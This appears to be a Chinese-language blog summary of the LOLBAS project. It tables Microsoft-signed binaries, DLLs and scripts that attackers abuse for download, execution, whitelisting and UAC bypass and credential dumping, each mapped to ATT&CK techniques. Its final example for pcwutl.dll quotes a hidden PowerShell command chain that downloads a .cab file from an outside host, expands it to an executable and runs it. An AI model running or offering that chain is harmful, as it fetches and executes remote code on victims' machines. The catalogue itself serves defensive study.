简介

https://lolbas-project.github.io/

https://github.com/LOLBAS-Project/LOLBAS/blob/master/README.md

”Living off the land“这个词是由 Christopher Campbell (@obscuresec) 和 Matt Graeber (@mattifestation) 在DerbyCon 3上创造的。LOLBins 一词来自 Twitter 上关于什么叫做二进制文件的讨论，攻击者可以使用这些二进制文件来执行超出其原始目的的操作。Philip Goh (@MathCasualty)提出了 LOLBins。随后进行了一项高度科学的互联网民意调查，并在达成普遍共识（69％）后，该名称被正式命名。Jimmy (@bohops)跟进了 LOLScripts。没有进行民意调查。

这些文件的常见主题标签是：

#LOLBin
#LOLBins
#LOLScript
#LOLScripts
#LOLLib
#LOLLibs

LOLBin是翻译为“生活在陆地上的文件”，就是利用白名单文件执行恶意功能。

LOLBin/Lib/脚本必须符合以下要求

1. Microsoft 签名的文件，可以是操作系统的本机文件，也可以是从 Microsoft 下载的文件

2. 具有额外的“意外”功能。例如白名单绕过

3. 具有对APT或红队有用的功能

有趣的功能可以包括

执行代码

任意代码执行
传递执行其他程序（未签名）或脚本（通过 LOLBin）

编译代码

文件操作

下载
上传
复制

持久性

利用现有 LOLBin 的达到持久性
持久性（例如在 ADS 中隐藏数据，登录时执行）

UAC绕过

凭证盗窃

转储进程内存

监视（例如键盘记录器、网络跟踪）

日志规避/修改

DLL 侧加载/劫持而不被重新定位到文件系统中的其他位置。

GTFOBins

这是同类的Unix二进制列表

LOLBin列表

https://github.com/TideSec/BypassAntiVirus 有文章逐一分析过

https://www.yuque.com/tidesec/bypassav

文件	功能	类型	ATT&CK® Techniques
AppInstaller.exe	下载(Download)	二进制(Binaries)	T1105: IngressTool Transfer
Aspnet_Compiler.exe	AWL bypass	二进制(Binaries)	T1127: Trusted Developer Utilities Proxy Execution
At.exe	执行(Execute)	二进制(Binaries)	T1053.002: At
Atbroker.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Bash.exe	执行(Execute) AWL bypass	二进制(Binaries)	T1202: Indirect Command Execution
Bitsadmin.exe	备用数据流(Alternate data streams) 下载(Download) 复制(Copy) 执行(Execute)	二进制(Binaries)	T1564.004: NTFS File Attributes T1105: Ingress Tool Transfer T1218: System Binary Proxy Execution
CertOC.exe	执行(Execute) 下载(Download)	二进制(Binaries)	T1218: System Binary Proxy Execution T1105: Ingress Tool Transfer
CertReq.exe	下载(Download) 上传(Upload)	二进制(Binaries)	T1105: Ingress Tool Transfer
Certutil.exe	下载(Download) 备用数据流(Alternate data streams) 编码(Encode) 解码(Decode)	二进制(Binaries)	T1105: Ingress Tool Transfer T1564.004: NTFS File Attributes T1027: Obfuscated Files or Information T1140: Deobfuscate/Decode Files or Information
Cmd.exe	备用数据流(Alternate data streams)	二进制(Binaries)	T1059.003: Windows Command Shell
Cmdkey.exe	Credentials	二进制(Binaries)	T1078: Valid Accounts
cmdl32.exe	下载(Download)	二进制(Binaries)	T1105: Ingress Tool Transfer
Cmstp.exe	执行(Execute) AWL bypass	二进制(Binaries)	T1218.003: CMSTP
ConfigSecurityPolicy.exe	上传(Upload)	二进制(Binaries)	T1567: Exfiltration Over Web Service
Conhost.exe	执行(Execute)	二进制(Binaries)	T1202: Indirect Command Execution
Control.exe	备用数据流(Alternate data streams)	二进制(Binaries)	T1218.002: Control Panel
Csc.exe	编译(Compile)	二进制(Binaries)	T1127: Trusted Developer Utilities Proxy Execution
Cscript.exe	备用数据流(Alternate data streams)	二进制(Binaries)	T1564.004: NTFS File Attributes
DataSvcUtil.exe	上传(Upload)	二进制(Binaries)	T1567: Exfiltration Over Web Service
Desktopimgdownldr.exe	下载(Download)	二进制(Binaries)	T1105: Ingress Tool Transfer
Dfsvc.exe	AWL bypass	二进制(Binaries)	T1127: Trusted Developer Utilities Proxy Execution
Diantz.exe	备用数据流(Alternate data streams) 下载(Download)	二进制(Binaries)	T1564.004: NTFS File Attributes T1105: Ingress Tool Transfer
Diskshadow.exe	转储(Dump) 执行(Execute)	二进制(Binaries)	T1003.003: NTDS T1202: Indirect Command Execution
Dnscmd.exe	执行(Execute)	二进制(Binaries)	T1543.003: Windows Service
Esentutl.exe	复制(Copy) 备用数据流(Alternate data streams) 下载(Download)	二进制(Binaries)	T1105: Ingress Tool Transfer T1564.004: NTFS File Attributes T1003.003: NTDS
Eventvwr.exe	UAC bypass	二进制(Binaries)	T1548.002: Bypass User Account Control
Expand.exe	下载(Download) 复制(Copy) 备用数据流(Alternate data streams)	二进制(Binaries)	T1105: Ingress Tool Transfer T1564.004: NTFS File Attributes
Explorer.exe	执行(Execute)	二进制(Binaries)	T1202: Indirect Command Execution
Extexport.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Extrac32.exe	备用数据流(Alternate data streams) 下载(Download) 复制(Copy)	二进制(Binaries)	T1564.004: NTFS File Attributes T1105: Ingress Tool Transfer
Findstr.exe	备用数据流(Alternate data streams) 证书(Credentials) 下载(Download)	二进制(Binaries)	T1564.004: NTFS File Attributes T1552.001: Credentials In Files T1105: Ingress Tool Transfer
Finger.exe	下载(Download)	二进制(Binaries)	T1105: Ingress Tool Transfer
fltMC.exe	备用数据流(Alternate data streams)	二进制(Binaries)	T1562.001: Disable or Modify Tools
Forfiles.exe	执行(Execute) 备用数据流(Alternate data streams)	二进制(Binaries)	T1202: Indirect Command Execution T1564.004: NTFS File Attributes
http://Ftp.exe	执行(Execute) 下载(Download)	二进制(Binaries)	T1202: Indirect Command Execution T1105: Ingress Tool Transfer
GfxDownloadWrapper.exe	下载(Download)	二进制(Binaries)	T1105: Ingress Tool Transfer
Gpscript.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Hh.exe	下载(Download) 执行(Execute)	二进制(Binaries)	T1105: Ingress Tool Transfer T1218.001: Compiled HTML File
IMEWDBLD.exe	下载(Download)	二进制(Binaries)	T1105: Ingress Tool Transfer
Ie4uinit.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Ieexec.exe	下载(Download) 执行(Execute)	二进制(Binaries)	T1105: Ingress Tool Transfer T1218: System Binary Proxy Execution
Ilasm.exe	编译(Compile)	二进制(Binaries)	T1127: Trusted Developer Utilities Proxy Execution
Infdefaultinstall.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Installutil.exe	AWL bypass 执行(Execute)	二进制(Binaries)	T1218.004: InstallUtil
Jsc.exe	编译(Compile)	二进制(Binaries)	T1127: Trusted Developer Utilities Proxy Execution
Makecab.exe	备用数据流(Alternate data streams) 下载(Download)	二进制(Binaries)	T1564.004: NTFS File Attributes T1105: Ingress Tool Transfer
Mavinject.exe	执行(Execute) 备用数据流(Alternate data streams)	二进制(Binaries)	T1218.013: Mavinject T1564.004: NTFS File Attributes
Microsoft.Workflow.Compiler.exe	执行(Execute) AWL bypass	二进制(Binaries)	T1127: Trusted Developer Utilities Proxy Execution
Mmc.exe	执行(Execute) UAC bypass	二进制(Binaries)	T1218.014: MMC
MpCmdRun.exe	下载(Download) 备用数据流(Alternate data streams)	二进制(Binaries)	T1105: Ingress Tool Transfer T1564.004: NTFS File Attributes
Msbuild.exe	AWL bypass 执行(Execute)	二进制(Binaries)	T1127.001: MSBuild
Msconfig.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Msdt.exe	执行(Execute) AWL bypass	二进制(Binaries)	T1218: System Binary Proxy Execution
Mshta.exe	执行(Execute) 备用数据流(Alternate data streams)	二进制(Binaries)	T1218.005: Mshta
Msiexec.exe	执行(Execute)	二进制(Binaries)	T1218.007: Msiexec
Netsh.exe	执行(Execute)	二进制(Binaries)	T1546.007: Netsh Helper DLL
Odbcconf.exe	执行(Execute)	二进制(Binaries)	T1218.008: Odbcconf
OfflineScannerShell.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
OneDriveStandaloneUpdater.exe	下载(Download)	二进制(Binaries)	T1105: Ingress Tool Transfer
Pcalua.exe	执行(Execute)	二进制(Binaries)	T1202: Indirect Command Execution
Pcwrun.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Pktmon.exe	侦擦(Reconnaissance)	二进制(Binaries)	T1040: Network Sniffing
Pnputil.exe	执行(Execute)	二进制(Binaries)	T1547: Boot or Logon Autostart Execution
Presentationhost.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Print.exe	备用数据流(Alternate data streams) 复制(Copy)	二进制(Binaries)	T1564.004: NTFS File Attributes T1105: Ingress Tool Transfer
PrintBrm.exe	下载(Download) 备用数据流(Alternate data streams)	二进制(Binaries)	T1105: Ingress Tool Transfer T1564.004: NTFS File Attributes
Psr.exe	侦擦(Reconnaissance)	二进制(Binaries)	T1113: Screen Capture
Rasautou.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
rdrleakdiag.exe	转储(Dump)	二进制(Binaries)	T1003: OS Credential Dumping T1003.001: LSASS Memory
Reg.exe	备用数据流(Alternate data streams) 证书(Credentials)	二进制(Binaries)	T1564.004: NTFS File Attributes T1003.002: Security Account Manager
Regasm.exe	AWL bypass 执行(Execute)	二进制(Binaries)	T1218.009: Regsvcs/Regasm
Regedit.exe	备用数据流(Alternate data streams)	二进制(Binaries)	T1564.004: NTFS File Attributes
Regini.exe	备用数据流(Alternate data streams)	二进制(Binaries)	T1564.004: NTFS File Attributes
Register-cimprovider.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Regsvcs.exe	执行(Execute) AWL bypass	二进制(Binaries)	T1218.009: Regsvcs/Regasm
Regsvr32.exe	AWL bypass 执行(Execute)	二进制(Binaries)	T1218.010: Regsvr32
Replace.exe	复制(Copy) 下载(Download)	二进制(Binaries)	T1105: Ingress Tool Transfer
Rpcping.exe	证书(Credentials)	二进制(Binaries)	T1003: OS Credential Dumping T1187: Forced Authentication
Rundll32.exe	执行(Execute) 备用数据流(Alternate data streams)	二进制(Binaries)	T1218.011: Rundll32 T1564.004: NTFS File Attributes
Runonce.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Runscripthelper.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Sc.exe	备用数据流(Alternate data streams)	二进制(Binaries)	T1564.004: NTFS File Attributes
Schtasks.exe	执行(Execute)	二进制(Binaries)	T1053.005: Scheduled Task
Scriptrunner.exe	执行(Execute)	二进制(Binaries)	T1202: Indirect Command Execution T1218: System Binary Proxy Execution
SettingSyncHost.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Stordiag.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
SyncAppvPublishingServer.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Ttdinject.exe	执行(Execute)	二进制(Binaries)	T1127: Trusted Developer Utilities Proxy Execution
Tttracer.exe	执行(Execute) 转储(Dump)	二进制(Binaries)	T1127: Trusted Developer Utilities Proxy Execution T1003: OS Credential Dumping
vbc.exe	编译(Compile)	二进制(Binaries)	T1127: Trusted Developer Utilities Proxy Execution
Verclsid.exe	执行(Execute)	二进制(Binaries)	T1218.012: Verclsid
Wab.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Wlrmdr.exe	执行(Execute)	二进制(Binaries)	T1202: Indirect Command Execution
Wmic.exe	备用数据流(Alternate data streams) 执行(Execute)	二进制(Binaries)	T1564.004: NTFS File Attributes T1218: System Binary Proxy Execution
WorkFolders.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Wscript.exe	备用数据流(Alternate data streams)	二进制(Binaries)	T1564.004: NTFS File Attributes
Wsreset.exe	UAC bypass	二进制(Binaries)	T1548.002: Bypass User Account Control
wuauclt.exe	执行(Execute)	二进制(Binaries)	T1218: System Binary Proxy Execution
Xwizard.exe	执行(Execute) 下载(Download)	二进制(Binaries)	T1218: System Binary Proxy Execution T1105: Ingress Tool Transfer
Advpack.dll	AWL bypass 执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Desk.cpl	执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Dfshim.dll	AWL bypass	库文件(Libraries)	T1127: Trusted Developer Utilities Proxy Execution
Ieadvpack.dll	AWL bypass 执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Ieframe.dll	执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Mshtml.dll	执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Pcwutl.dll	执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Setupapi.dll	AWL bypass 执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Shdocvw.dll	执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Shell32.dll	执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Syssetup.dll	AWL bypass 执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Url.dll	执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Zipfldr.dll	执行(Execute)	库文件(Libraries)	T1218.011: Rundll32
Comsvcs.dll	转储(Dump)	库文件(Libraries)	T1003.001: LSASS Memory
AccCheckConsole.exe	执行(Execute) AWL bypass	OtherMSBinaries	T1218: System Binary Proxy Execution
adplus.exe	转储(Dump)	OtherMSBinaries	T1003.001: LSASS Memory
AgentExecutor.exe	执行(Execute)	OtherMSBinaries	T1218: System Binary Proxy Execution
Appvlp.exe	执行(Execute)	OtherMSBinaries	T1218: System Binary Proxy Execution
Bginfo.exe	执行(Execute) AWL bypass	OtherMSBinaries	T1218: System Binary Proxy Execution
Cdb.exe	执行(Execute)	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
coregen.exe	执行(Execute) AWL bypass	OtherMSBinaries	T1055: Process Injection T1218: System Binary Proxy Execution
csi.exe	执行(Execute)	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
DefaultPack.EXE	执行(Execute)	OtherMSBinaries	T1218: System Binary Proxy Execution
Devtoolslauncher.exe	执行(Execute)	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
dnx.exe	执行(Execute)	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
Dotnet.exe	AWL bypass 执行(Execute)	OtherMSBinaries	T1218: System Binary Proxy Execution
Dump64.exe	转储(Dump)	OtherMSBinaries	T1003.001: LSASS Memory
Dxcap.exe	执行(Execute)	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
Excel.exe	下载(Download)	OtherMSBinaries	T1105: Ingress Tool Transfer
Fsi.exe	AWL bypass	OtherMSBinaries	T1059: Command and Scripting Interpreter
FsiAnyCpu.exe	AWL bypass	OtherMSBinaries	T1059: Command and Scripting Interpreter
Mftrace.exe	执行(Execute)	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
Msdeploy.exe	执行(Execute) AWL bypass	OtherMSBinaries	T1218: System Binary Proxy Execution
msxsl.exe	执行(Execute) AWL bypass	OtherMSBinaries	T1218: System Binary Proxy Execution
ntdsutil.exe	转储(Dump)	OtherMSBinaries	T1003.003: NTDS
Powerpnt.exe	下载(Download)	OtherMSBinaries	T1105: Ingress Tool Transfer
Procdump(64).exe	执行(Execute)	OtherMSBinaries	T1202: Indirect Command Execution
rcsi.exe	执行(Execute) AWL bypass	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
Remote.exe	AWL bypass 执行(Execute)	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
Sqldumper.exe	转储(Dump)	OtherMSBinaries	T1003: OS Credential Dumping T1003.001: LSASS Memory
Sqlps.exe	执行(Execute)	OtherMSBinaries	T1218: System Binary Proxy Execution
SQLToolsPS.exe	执行(Execute)	OtherMSBinaries	T1218: System Binary Proxy Execution
Squirrel.exe	下载(Download) AWL bypass 执行(Execute)	OtherMSBinaries	T1218: System Binary Proxy Execution
te.exe	执行(Execute)	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
Tracker.exe	执行(Execute) AWL bypass	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
Update.exe	下载(Download) AWL bypass 执行(Execute)	OtherMSBinaries	T1218: System Binary Proxy Execution T1547: Boot or Logon Autostart Execution T1070: Indicator Removal on Host
VSIISExeLauncher.exe	执行(Execute)	OtherMSBinaries	T1218: System Binary Proxy Execution
VisualUiaVerifyNative.exe	AWL bypass	OtherMSBinaries	T1218: System Binary Proxy Execution
vsjitdebugger.exe	执行(Execute)	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
Wfc.exe	AWL bypass	OtherMSBinaries	T1127: Trusted Developer Utilities Proxy Execution
Winword.exe	下载(Download)	OtherMSBinaries	T1105: Ingress Tool Transfer
Wsl.exe	执行(Execute) 下载(Download)	OtherMSBinaries	T1202: Indirect Command Execution
CL_LoadAssembly.ps1	执行(Execute)	脚本(Scripts)	T1216: System Script Proxy Execution
CL_Mutexverifiers.ps1	执行(Execute)	脚本(Scripts)	T1216: System Script Proxy Execution
CL_Invocation.ps1	执行(Execute)	脚本(Scripts)	T1216: System Script Proxy Execution
Manage-bde.wsf	执行(Execute)	脚本(Scripts)	T1216: System Script Proxy Execution
Pubprn.vbs	执行(Execute)	脚本(Scripts)	T1216.001: PubPrn
Syncappvpublishingserver.vbs	执行(Execute)	脚本(Scripts)	T1216: System Script Proxy Execution
UtilityFunctions.ps1	执行(Execute)	脚本(Scripts)	T1216: System Script Proxy Execution
winrm.vbs	执行(Execute) AWL bypass	脚本(Scripts)	T1216: System Script Proxy Execution
Pester.bat	执行(Execute)	脚本(Scripts)	T1216: System Script Proxy Execution

实例

pcwutl.dll

例1：Start-Process $cmd -windowstyle hidden -ArgumentList “/c rundll32.exe pcwutl.dll,LaunchApplication $cmd”;$cmd = “c:\windows\system32\cmd.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c taskkill /f /im msdt.exe”;Start-Process $cmd -windowstyle hidden -ArgumentList “/c cd C:\users\public\&&powershell iwr -uri https://exchange.oufca.com.au/aspnet_client/test.cab -o test.cab&&expand test.cab abc.exe&&abc.exe”;

例2：rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe